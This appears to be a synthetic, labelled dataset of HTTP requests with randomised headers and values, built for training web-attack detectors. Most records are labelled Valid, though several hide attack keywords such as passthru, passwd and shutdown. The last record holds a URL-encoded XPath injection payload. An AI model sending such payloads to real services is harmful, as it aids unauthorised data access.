Cookie: qmnXrinovO=tt1i;mg=1629661576;tgnNeH=neeqe3csul;epDnitueskOa=tA;etetlofaTt=32
Cookie2: $Version="891"
Date: Thu, 10 Aug 06 03:51:20 GMT
ETag: W/"EqD@suDSZ-6kzkU3OMMy"
Expect: 100-continue
If-Modified-Since: Fri, 10 Mar 06 20:56:58 CET
If-Unmodified-Since: Sat, 13 Sep 08 13:46:17 CET
If-Match: "lH4GhD2zg16DfzZ4Pcz"
If-None-Match: "sGRfe6R-RBCty.SHb"
If-Range: Sun, 28 Feb 10 04:48:28 GMT
Max-Forwards: 8521
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM TnN0dGVxMXJlaHFlYWFwYXdNUmxydGptb2F0dHRzYXN5
Authorization: Basic c2kyQjpnb3Zp
Range: 90-,27-,-938216
Referer: http://euA3h.it/nhwlkni/tdeqtngr/raauecHo.nsf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/9.0 (X11; U; Open BSD i386 1.9; gn-si; rv:0.6.5) Gecko/44338006
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4162x972
Via: FTP/6.2 www.ptre4acH.html, 6.4 173.149.224.86
Transfer-Encoding: b1rw; d3xhFrue=e8n5mcne
Warning: 911 148.86.166.125:8448 "aOi1" 
X-Serial-Number: 15636847207020
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39416
Start - Id: 12366
class: Valid
GET /Ouy24RjmailvC2A/eG-oz7W7QuWy/nneYiads/uqKpNtfUgD5Jl/1n0/lS3OhNr/KaqcopyA/iENTk7jCLDHL/dilocilioewln6i1tea/e2X_dVMQm7ZTmga3/tvc9ccT0-fOYI/hv47V7pA09QwJ_zoKp.E.gif?Miir6lltrOtmEoc=-r6tcc12oainsert%3Fateidtue&oNctChimrta=7f9nghagoeatHa&aaFeAw=89845263&whereNWhtacces-FPULm=e+p+ttr&sYtw=60329&mIees8vum=913&onu=linsm12L HTTP/1.0
Host: 150.11.9.112:80
Connection: osjk92
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: vTiei-de0t, yceu6-zeds;q=0.6, s-del6u40t
Cache-Control: no-store
Client-ip: 102.169.186.69
Cookie: iikdahatde=pZLPpzvl9vXl
Cookie2: $Version="95"
Date: Tue, 20 Jan 04 16:57:29 GMT
ETag: W/"iCE5UJcs-dA3J496"
Expect: 58eo=J2ehihen;ewaeiah=i5ci13a
From: Tnnrip@eam1hohoia.org
If-Modified-Since: Sun, 25 Jan 09 06:40:30 GMT
If-Unmodified-Since: Tue, 01 Apr 08 04:37:00 GMT
If-Match: *
If-None-Match: "CRK-6t4fStWmlK-aWbV"
If-Range: "ylvpmcLVj-cjGNOMH-xT"
Max-Forwards: 0063
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM c2FCOXNTaXRydUJvWHRlY3poZEQybmF0c3lkdGNlNGNkdG9qZWJEV3luZWxiaXR2
Authorization: 19Orw ee43=sMeyL
Range: 662-4,8147-,483669-546
Referer: /tltsoo/aLt2ovo/eshote1/dotvqTcT/g2tMsatd.sh
TE: gzip,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.9 (compatible; ehyxS; Open BSD i586; emey7eraNi)
UA-CPU: 68000
UA-Disp: 3711,172,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8258x863
Via: HTTP/1.3 www.Thac4.jpeg
Transfer-Encoding: t1qhe
Upgrade: fqto/4.8
Warning: 713 www.kooge.htm "s9oterkw" "Fri, 20 Feb 09 09:08:07 CET"
X-Forwarded-For: 15.44.254.140
X-Serial-Number: 250138591797251529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12366
Start - Id: 17161
class: Valid
GET /c_S/lPLu8uj7/eiyavgrbutltit.php3?si0bofhus=anoon%3B&rrdfcwzotmeuen=OcooGMdriiy3neid&ottt=834103 HTTP/1.1
Host: 117.217.180.77
Connection: trShExn
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: min-fresh=68
Client-ip: 193.42.5.207
Cookie: aueegoaxpP=ptrcnnis5;etts=8060909;fil=re+s;awratteteDh=sJ1_ez;rvnjaoFH=rMr7W;r0w=4350
Cookie2: $Version="25"
Date: Thu, 14 Aug 08 23:07:20 UTC
ETag: W/"fC2iwVqebiOk3RGH"
Expect: hstde=1ellit
From: gcEsmc@smae.st
If-Modified-Since: Fri, 09 Jan 09 22:19:36 UTC
If-Unmodified-Since: Thu, 21 Apr 05 06:58:00 GMT
If-Match: *
If-None-Match: "FBUwaohQJ1Ier._Ce"
If-Range: *
Max-Forwards: 645
MIME-Version: 3.2
Pragma: d=irNtsea
Proxy-Authorization: NTLM ZWw1YzF0U1RkcmVlWnB5aGhpbzJOZXdQbGlkU29ucm9s
Authorization: iis40p ltrk2=itoiems
Range: 390931-971113
Referer: http://adaos.it/nrlIuwfl/oginaglg/Qstf.tar.gz
TE: gzip,trailers,deflate;q=0.0
Trailer: Accept-Encoding
User-Agent: nhsndnhtl (ndwiMI; evdtvTHX)
UA-CPU: StrongARM
UA-Disp: 182,819,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: 1.7 www.mona.jpeg
Transfer-Encoding: identity
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 696 226.137.21.239 "teancE6uh" 
X-Forwarded-For: 181.160.254.196
X-Serial-Number: 80895113
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17161
Start - Id: 5606
class: Valid
PUT /ra1e/dE/ubfOyaon946/maenevi/PnV.q/sbyW/Zolttbabhatrcol/sgqldsxgNasoro4grs/m3Tdh.jpeg? HTTP/1.0
Content-Length: 179
Content-Language: tL4slo
Content-Encoding: identity
Content-Location: /s9fld0ky/attam/o6Rn.swf
Content-MD5: ZVRzdGlsZW9yeTRmaWVlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 31 May 07 02:03:48 UTC
Last-Modified: Thu, 23 Sep 04 15:44:02 UTC
Host: 155.144.153.137
Connection: close
Accept: audio/*;q=0.4, image/jpeg;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: identity, identity;q=0.7, gzip;q=0.9
Accept-Language: aettgp-t;q=0.3, ga1abni-wmC;q=0.4, eeehure-eRiicni;q=0.3, atgzbLc-JheoTvtb;q=0.2
Cache-Control: min-fresh=21
Client-ip: 177.159.153.146
Cookie: tElnUbe=9252;3x8WBz=448;etiorb=h|
Cookie2: $Version="9"
Date: Mon, 24 May 04 17:25:29 UTC
ETag: "_dWm@9n07vqjeO4UE"
Expect: 100-continue
From: eStnia@as0Fhr.uk
If-Modified-Since: Mon, 02 Oct 06 10:48:55 GMT
If-Unmodified-Since: Tue, 21 Dec 04 23:03:21 CET
If-Match: *
If-None-Match: "veUBYxL6UY9u3NU1E"
If-Range: Mon, 06 Jun 05 23:15:57 CET
Max-Forwards: 213
MIME-Version: 1.9
Pragma: 8=o
Proxy-Authorization: NTLM aWVmZWpnYWlnbW9kZXJlZE55YTJmRVQ5ZVRFc2VlaHRhZXk=
Authorization: Riea nmahUap=eemhieh
Range: 0245-
Referer: http://www.oiolvs.uk/naltiwc/uwsdtinj/nmiawi.msf
TE: chunked;q=0.6,gzip,trailers
Trailer: If-Modified-Since
User-Agent: edd79h1/9.3.8
UA-CPU: MIPS
UA-Disp: 6817,0716,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0202x3743
Via: FTP/4.2 84.85.242.95, HTTP/5.0 198.204.224.252, FTP/5.7 40.85.188.178
Transfer-Encoding: gzip
Upgrade: uv6jTt/2.4
Warning: 752 www.cBkrdl.png "UEoze97gbdRatOio" "Sat, 14 Jul 07 18:16:50 UTC"
X-Forwarded-For: 253.42.32.113
X-Serial-Number: 7014694
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6ossv0algsak5=8&6cMPz.x12=iiimstdinpsvbscripts&-HgrmsrBmb=2273576&c2gesan=1aitWt1&omaikcFNyto=mEsn7ou&eneee5ldzNrT=ieeTftph]gTadx8'E aom &uEpowP=hhoED&lsrTtextpphligl=69660302

End - Id: 5606
Start - Id: 2716
class: Valid
GET /riYZl8oo/s8rZ8Imlct.N/ageQoeidret.jpeg?6n=h9Sfo&sgeojnasoyltOn=65135&e7uo=a7ie&csonlTnnotenlms=p%25&ah7eifon=lqm&acvnHn=+utr&e3kcr=37618126&vo4dyTcpOaQ6=gbWIK HTTP/1.1
Host: www.tnbrune.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: qla-yeu8dtbn, R-e;q=0.7, odOku0rx-auemdHe
Cache-Control: no-store
Client-ip: 118.196.176.82
Cookie: ci=droptraaSkj
Cookie2: $Version="39"
Date: Sun, 06 Aug 06 18:37:02 CET
ETag: W/"tl03X75yzzkyhRscYHqO"
Expect: matihte=7pwmDa
From: elaee@z3vnA8l.ch
If-Modified-Since: Mon, 23 Mar 09 22:21:29 UTC
If-Unmodified-Since: Tue, 12 Aug 08 03:33:59 CET
If-Match: "o2jtb5z4XwpP43w"
If-None-Match: "RPjLP8UPGI3ClkvIwGgI"
If-Range: Fri, 21 Jul 06 11:12:10 GMT
Max-Forwards: 836
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: Digest opaque="vctre"
Range: 800-526712,0803-
Referer: http://ycosYai4.ch/gtnuvo/umngnmo.cfm
TE: gzip;q=0.8,trailers,deflate;q=0.2
Trailer: Expect
User-Agent: Mozilla/4.5 (Machintosh; U; PPC 0.1; fh-3f; rv:3.4.2) Gecko/92120358
UA-CPU: 68000
UA-Disp: 991,432,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9002x158
Via: 4.1 23.96.236.139
Transfer-Encoding: gzip
Upgrade: foys/2.8, sSboa/7.3, alt/9.7, arhxe/9.3, g5ee4a/9.9
Warning: 722 219.161.37.147 "eueen5o9vYS" "Tue, 30 Aug 05 03:30:07 CET"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2716
Start - Id: 15993
class: Valid
GET /iSMOIGBIi@IXylJqV5W/tU59tSUeWj_/eeijawilfe/ipoy/nonpGinb4D8gtlemuey7.gif?inwp-kjDimgRg0d5=fe&shh=%27%7Erf+s%26etc&tsp8wi9fuap=dN&Iee=39323846&e5f-eTN0aPL=8 HTTP/1.1
Host: 88.102.22.178
Connection: keep-alive
Accept: application/*;q=0.1
Accept-Charset: gb2312, cp-950;q=0.6, windows-1251, big5;q=0.8, iso-8859-9
Accept-Encoding: compress, gzip;q=0.5, deflate, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 69.188.97.64
Cookie: Dqan3fmrJluCi=ktodUcopyd;Eauksgu3r=mzM
Cookie2: $Version="79"
Date: Wed, 22 Apr 09 06:08:06 UTC
ETag: "_D3_axB00MZ4i6j8tw7"
Expect: 5pnte
From: aebIo@aienFcnaoN.cz
If-Modified-Since: Mon, 09 Oct 06 12:04:56 UTC
If-Unmodified-Since: Tue, 12 May 09 03:09:15 UTC
If-Match: "EPYxHl0xgS9QbQqC"
If-None-Match: *
If-Range: "tgjql-3qHmA9X0dBVY"
Max-Forwards: 3345
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM aTFlYWhlY2FpYW5hMGlXbGhkYm5sbkhqZm5lQW5ucmVjeG1hbzZ3bjJ3aXM=
Authorization: emsS3H to7al=yie9
Range: 4-136390,-06191
Referer: /nanhh/9ehmtj/pnbPt9.php4
TE: trailers,deflate;q=0.7
Trailer: Accept-Language
User-Agent: Mozilla/6.4 (X11; U; Unix 3.7; ea-am; rv:1.8.2) Gecko/07856771
UA-CPU: PowerPC
UA-Disp: 9829,461,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1814x7324
Via: 9.9 133.225.252.111:56674, 3.3 www.x9rrgP.gif
Transfer-Encoding: compress
Upgrade: aieRqe/7.7, c9oee/9.2, Halyoi/5.2, nsb/5.8
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 157.210.6.61
X-Serial-Number: 606819653
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15993
Start - Id: 30796
class: Valid
GET /eithxh4/tuHlauyimbefw/tWbV0.php? HTTP/1.1
Host: www.ws0ahro.be
Connection: keep-alive
Accept: image/gif;q=0.6, image/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, gzip;q=0.9
Accept-Language: vfedEol3-eptmi, etielsa-tqo, s9esYl-s3GFgu, R6-tnmulsme, sBqn9eei-ncom
Cache-Control: max-stale
Client-ip: 119.190.75.171
Cookie: tea=2
Cookie2: $Version="55"
Date: Fri, 27 Jun 08 03:58:39 GMT
ETag: "r8GbOFMovVI_ULq"
Expect: rsbooe
From: perd@aarfit.it
If-Modified-Since: Sun, 27 Feb 05 07:16:57 UTC
If-Unmodified-Since: Sun, 18 Sep 05 10:16:00 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 409
MIME-Version: 6.9
Pragma: 8fyt0='eoyn'
Proxy-Authorization: nuit2t Ja4ekbcr=ksnl
Authorization: hialxr iitabj=rfnRHsa
Range: 40-,5809-053,-843
Referer: http://Tlnz.com/ntdE/IalL/vhaw.asmx
TE: gzip
Trailer: Range
User-Agent: Mozilla/5.1 (Machintosh; U; Mac OS X 9.9; e3-he; rv:5.0.3) Gecko/51358272
UA-CPU: 68000
UA-Disp: 5087,659,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5335x466
Via: 3.6 237.64.52.192, thy9L/9.6 www.nRfHji.png
Transfer-Encoding: identity
Upgrade: uIT/1.8, hdv/9.8
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 277433290484890410
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30796
Start - Id: 15123
class: Valid
GET /is_TqcK7q/iewedupr1d3aAO/0HnfzthmbptIeipvii/dPYE/t0xogfp.msf?as3taeaus3e=7ls9i1-5IjX&WjmiXB7=oho9ssmtZNbre&ipra7oea2l=t%40inan+&en4mfa1oeneIia=714172&zsidsv=system%5D%3Edprocessing-instruction&aSo2zBTto4ncla=95811&CfromZkprocessing-instruction9oY-FFp=68&Drawgu=%5B11oe HTTP/1.1
Host: www.ahroc.de
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-hebrew;q=0.6, euc-cn;q=0.9, big5;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: heersc-flyrIa;q=0.1, sn-xo01;q=0.5, 6miai-el, solsrdk-Im6ntdif;q=0.0, 7ahtry-tdxdetB7;q=0.5
Cache-Control: no-cache
Client-ip: 65.10.135.69
Cookie: SRPd=9982
Cookie2: $Version="7"
Date: Mon, 23 Feb 09 10:54:18 CET
ETag: "lOTkK2qMWKf-Hnr"
Expect: 100-continue
From: rstu@ibae.fr
If-Modified-Since: Tue, 10 Mar 09 18:53:19 GMT
If-Unmodified-Since: Mon, 29 Mar 10 09:09:16 GMT
If-Match: "UUu-j@QFoFfD4HoXZ8T"
If-None-Match: *
If-Range: Mon, 08 Mar 04 07:11:59 GMT
Max-Forwards: 0830
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM OWZsYUoxOGl0dHNhcmVyaWU4cm5vaHBtcnJkc25yTm5waGVs
Authorization: NTLM QmVlR3ZzYVRlbW9vbXNuZXJzcm9ucm9hMWFhcnlxdHd1
Range: 0106-,35444-9,-1
Referer: /hemears.cgi
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.2 (Windows; U; Windows NT 0.1; ap-o1; rv:6.3.0) Gecko/55502661
UA-CPU: 68000
UA-Disp: 067,8316,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 572x437
Via: 3.8 www.tSnske.shtml, yuaa9/5.9 142.147.170.176
Transfer-Encoding: identity
Upgrade: qafs/3.4, ntrid/3.1, Ffue/7.1, 5uetew/4.0, pt9exy/2.3
Warning: 761 102.136.242.239 "sf0lErlspe" 
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 0851506973
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15123
Start - Id: 33544
class: Valid
POST /fXJSQ0G3JUyqGacos/bpse/hqe-75/tfAjnU4SE/x__lfkoiframelink/rnv08bywiqltp3.mspx? HTTP/1.1
Content-Length: 311
Content-Language: latnagIE,umie
Content-Encoding: deflate
Content-Location: http://www.txd5et.net/2sjrm1m/neywhret/bcgkca2.tar
Content-MD5: b3VlM2g0ZUVJbHRvbnRtcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Oct 08 10:12:32 UTC
Last-Modified: Thu, 12 Mar 09 04:57:09 GMT
Host: www.gwyo2.org
Connection: keep-alive
Accept: application/x-tar, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.4, gzip
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 159.30.34.225
Cookie: rnzeu=tr9utenu txh;i1cehidhl=95;aasrasYrll=eyC;tkadkfahatrUooh=in2nporiqeLr5siIh;ia2njliFsahtsaa=097883
Cookie2: $Version="7"
Date: Fri, 17 Feb 06 05:15:14 CET
ETag: "YXVeCo-6S3mqQfiA"
Expect: pIiwet
From: esu6@t5cEi.st
If-Modified-Since: Tue, 18 Jan 05 02:43:06 GMT
If-Unmodified-Since: Thu, 09 Jun 05 17:13:25 UTC
If-Match: *
If-None-Match: "cP7YehinvaTjkPs7H7J"
If-Range: "...uF7cyy8.OlU8bjM7"
Max-Forwards: 19
MIME-Version: 2.1
Pragma: i8lbelG=e
Proxy-Authorization: iegu ssseMwrr=mwsot
Authorization: eeri Bitat2n=teern
Range: -842
Referer: /hene/pwteL.jsp
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 0.1; oe-ai; rv:9.8.4) Gecko/01818024
UA-CPU: PowerPC
UA-Disp: 3018,583,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 417x756
Via: 1.9 223.220.5.154, FTP/2.0 193.228.52.168:69102, 7.9 150.86.151.218
Transfer-Encoding: ise9g
Upgrade: ISrcs/4.9, Gqo/4.9, rzorSu/0.2, remnis/8.6, ulste1/0.7
Warning: 636 www.asse.html "nsluyu6imh" "Fri, 28 Jul 06 18:49:46 GMT"
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 40780831538303970889
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

iehatariiuapo=i_@R_TGeei9Y&3JjODz_Kkr=uratuu tu]q|g&hotnitbcOs=963&e4aj3el=s&esfe=9130335&tzgnasdoMo=98058&3s=e3e0a&sJ1ni=iupdate4processing-instructioninsert&eSisnma=igeietfreabo&iiooasrhsos=7cb3&e9yylunejzr=S&rhtr=85&nsalartoxet=awnFs(;0aew scriptattect[&doEsoshs=esuvhlecfUsiaoaq&QhomePKbkulv=|

End - Id: 33544
Start - Id: 14024
class: Valid
GET /euaisKhfp1mzpitomheu/xYd/nvc4MG./aCT2ko.aspx?execosS4ZorI=%3Car&eps6=uSntea+ytxp_%28%7Cfws&ischeae9g=7843&4saqg9jlaatulh8=69000968&3nisoet3ieuztio=eqe3Sasdnorc&R1gKshutdownz.vi=smnrUyptA HTTP/1.0
Host: www.saawE.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: utf-8, iso-8859-7
Accept-Encoding: 
Accept-Language: a-TrSq;q=0.1, nretx-manEjr, gxs3ee0-jtaoTpir;q=0.4
Cache-Control: max-stale=86
Client-ip: 96.142.255.82
Cookie: Egedw5o=nvai< ftpformagyN';hre=e|ytevar6nm;ymey=wih;W77https3Uwq=?;BnZVzIR7Tb=mbwnw;TA \e1adocumentev'y?o
Cookie2: $Version="19"
Date: Sat, 25 Mar 06 12:00:09 CET
ETag: "BL8IO2.W.cvsQdvjJOWQ"
Expect: 0PLIf
From: aeeaqe@ea10ef.st
If-Modified-Since: Thu, 10 Aug 06 05:05:53 UTC
If-Unmodified-Since: Wed, 17 Jan 07 10:34:08 UTC
If-Match: *
If-None-Match: "eHyB8rivbphy5fx"
If-Range: Fri, 14 Nov 08 15:17:24 GMT
Max-Forwards: 203
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic b2ZsNmV3czplZ2Uya3I=
Authorization: hshoes a5uast4o=mchmrsoe
Range: -2,-28865
Referer: http://www.5ndwms.uk/aeelanme.nsf
TE: trailers
Trailer: Date
User-Agent: Mozilla/9.3 (compatible; Konqueror/9.6; WinNT; 2s5k9n2a; brdRe; n2fswmdiE)
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8443x481
Via: eyo/4.7 144.102.46.233, 1.0 www.do7wth.html, 6.6 238.125.51.175
Transfer-Encoding: gzip
Upgrade: eEeZe/7.4, Zmitao/2.6, hfrDo/5.0
Warning: 303 27.61.130.243 "4sxeeeopTs5wI" "Mon, 20 Nov 06 24:32:15 UTC"
X-Forwarded-For: 157.125.101.111
X-Serial-Number: 0043438224132828242
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14024
Start - Id: 566
class: Valid
GET /logv2GY/niimbonnhiaz/ct2haahEf/phomwNatoioaoeta/ndttvtlH2sdefstea/s81O80LrNp@Cxbc4TwKa/uBCTB-R/f-ohinsert7passthruZlike/ii4-p6eYyFEBSMp4kc4d/bgsoundUYzTP@NZFlike93U.php?utmhyeve1e4=eto&xLauhOnkdia=0from&tmwlnnaoF=kFfnsystemmt-samhdi&ieiehho=s&tlK4u6AN=adokeesa&jit=Warterm9hi5heA3Sn&mir6eac4kgnfln=7body&draanoews=0685898&ngGemmb=+rsotovlAhi%2Ba4&suSnsdfad=10660&kntktlsgc=iNGKzT706b&enode2passwd9passthru4tsZk=uawewm9ngBTl HTTP/1.0
Host: 210.250.234.32:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.3, identity;q=0.1, gzip;q=0.3, identity
Accept-Language: eehettmt-elbx;q=0.7, imef-lmsE;q=0.1
Cache-Control: only-if-cached
Client-ip: 9.224.224.178
Cookie: cti=18774995
Cookie2: $Version="404"
Date: Sat, 15 Jul 06 23:02:23 CET
ETag: W/"ln37JRy0Pdvd44lMwj2"
Expect: BmRn1rei=LlnY424
From: anpb@5nXz.cz
If-Modified-Since: Tue, 09 Oct 07 01:44:16 CET
If-Unmodified-Since: Thu, 18 May 06 06:22:28 GMT
If-Match: "-V8kghd_xTzratK_J0"
If-None-Match: "YpU8GOV8CiApl-ynQLRP"
If-Range: *
Max-Forwards: 332
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/enctRmn/arosaun.bin
Authorization: Basic SHFudGhobzo2ZXFvenM=
Range: 5753-
Referer: /eraesa1/aeaTegd/ioTNee/ritlla6e.mdb
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: prueeeq (cyzaXLiwH)
UA-CPU: MIPS
UA-Disp: 121,9701,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 412x961
Via: 0.1 149.100.137.243, 5.2 www.4ter5tp.css, HTTP/8.2 63.90.55.145
Transfer-Encoding: compress
Upgrade: tNs/1.9, LEdid/0.3
Warning: 107 www.ojbehoq.css "igabo" 
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 602347866565729
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 566
Start - Id: 6993
class: Valid
POST /Tnbtwe/b1G7Y8nopenIBnc/Vhtpass/sFpu/9UnJhHudaqpk0aB/aE/1H5yDaYk4Fy/cXyScrt.iptVKI.E/6htaccesfFbinesZC7D1/ePsYU1I@XBPN_OV/q6IB55EV.php4? HTTP/1.1
Content-Length: 84
Content-Language: t
Content-Encoding: compress
Content-Location: /anePaat8.tar
Content-MD5: dWgxY2NTZXRzdGw2bDR0Zw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Feb 08 08:29:12 UTC
Last-Modified: Thu, 02 Dec 04 05:51:56 UTC
Host: www.k7lhhcq.uk
Connection: keep-alive
Accept: application/rtf;q=0.3
Accept-Charset: cp-950;q=0.9, euc-cn, iso-8859-3, iso-8859-6;q=0.2
Accept-Encoding: compress;q=0.2, gzip;q=0.7
Accept-Language: *;q=0.2
Cache-Control: max-stale=76
Client-ip: 150.141.126.147
Cookie: tz8deee5aseha=lbiiesmors;mk6mqe=56772325;.VGuxKVrgxh=ss=execlG :ti=Mnc-
Cookie2: $Version="63"
Date: Sat, 20 May 06 21:37:15 UTC
ETag: "3gIgkHO_hlow8bKMf1kq"
Expect: surrr86e=naoonk
From: wywe@Otr8e.st
If-Modified-Since: Sun, 22 Feb 09 19:17:36 CET
If-Unmodified-Since: Thu, 12 Apr 07 03:19:00 UTC
If-Match: *
If-None-Match: *
If-Range: "0-ac6iIT2g4dtSlhPpIe"
Max-Forwards: 6
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: aasa0 Tiemls=e9ea
Authorization: eefbu Fbanrglt=frmrae9
Range: 544-,459-
Referer: http://www.ot4ds.biz/ehiqAucd/gth1fSto/eSao0r.jpeg
TE: trailers,trailers,chunked
Trailer: Host
User-Agent: Mozilla/1.3 (X11; U; Open BSD i386 8.5; 5r-mA; rv:7.3.6) Gecko/69251566
UA-CPU: 68000
UA-Disp: 4258,294,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 821x4420
Via: 3.3 www.ixrLdrl.js
Transfer-Encoding: compress
Upgrade: n2e/1.3
Warning: 506 www.isxea3en.htm "fCnsiousntr6A9nt" "Thu, 15 Mar 07 14:14:02 CET"
X-Forwarded-For: 67.65.254.52
X-Serial-Number: 95729667
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Es6irsufo=  dqscriptpdah&xtNlegn=8264&untinkcfqn9=Nrdf&dnsjn=07808944&dsncnblH1e=~

End - Id: 6993
Start - Id: 49421
class: XPathInjection
GET /9ieev5uepsnyigitsd/or/vEle2/porr9/xSoIVhtaccesKaaS/nmath3mtnuljm2mthoR/tl@6vi1cmgZE7JjvCx/iwieerf/iltaf4mwvaAiOirnT/itqdhtbaaqZtrehhohHs/rduaeuahtvnehgr.html?ymsriwo=cJBML&d2tIjsi=isE&@0skevalc9bbeXg=tcmd&sFvW7=hbjgI9E8CiFG&tct0vohkmmc=10934519&vZNsystem.telnetIYXC=rfu54es&rda6aIsswfnut=tvw&Mc=wAho&z6c3saw=edyyPN%2Ffrh%2Fsga%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D43%5D+++%7C++++ni3aar%2Fnl1eam%2FdEhnra%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D866%5D++++or+%27eoss%27++++%3D+%27&sOa0g7hste=+2tutel+mql&nuoeZematI=iymdmyr3nWstdzconnectlNel&NiJr=3209422117&d7eeaionea69oq=R%25c%27aeetea0es HTTP/1.1
Host: 186.162.57.86
Connection: ua3s
Accept: image/*, application/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: No-hitens, aan8beeb-Imes;q=0.3, thhedO-r7, Tthstzei-h, oaelqsi7-frEa;q=0.8
Cache-Control: only-if-cached
Client-ip: 93.18.190.156
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="37"
Date: Fri, 26 Sep 08 20:57:29 CET
ETag: W/"yBi@1NQdLHx8ApZv.y"
Expect: denean=anNwroTo
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 25 Jul 09 09:05:12 UTC
If-Unmodified-Since: Sat, 25 Oct 08 01:35:51 CET
If-Match: *
If-None-Match: "DH14wSY@1m_Vmjij6"
If-Range: "Mu-7L2kBKqVbrZs"
Max-Forwards: 2838
MIME-Version: 0.6
Pragma: 8OcST='hE'
Proxy-Authorization: Digest nonce
Authorization: Digest nc=A74a4Ae1
Range: -32,-92418
Referer: http://www.edlue.st/3EcTfueo/iuqd/qewqNeC/nbnh66.mpeg
TE: gzip,chunked,deflate;q=0.7
Trailer: Warning
User-Agent: Mozilla/7.0 (Machintosh; U; Mac OS X 4.0; ot-wr; rv:5.8.7) Gecko/30546870
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 8.4 191.223.218.165:1907, FTP/3.1 www.tHc9Nw.js
Transfer-Encoding: Nsocy; is4ea=nrdy1eiO
Upgrade: nostnl/9.9, gueoi/6.9, Nceiet/2.3, aiOs/0.5, fiuA/5.5
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

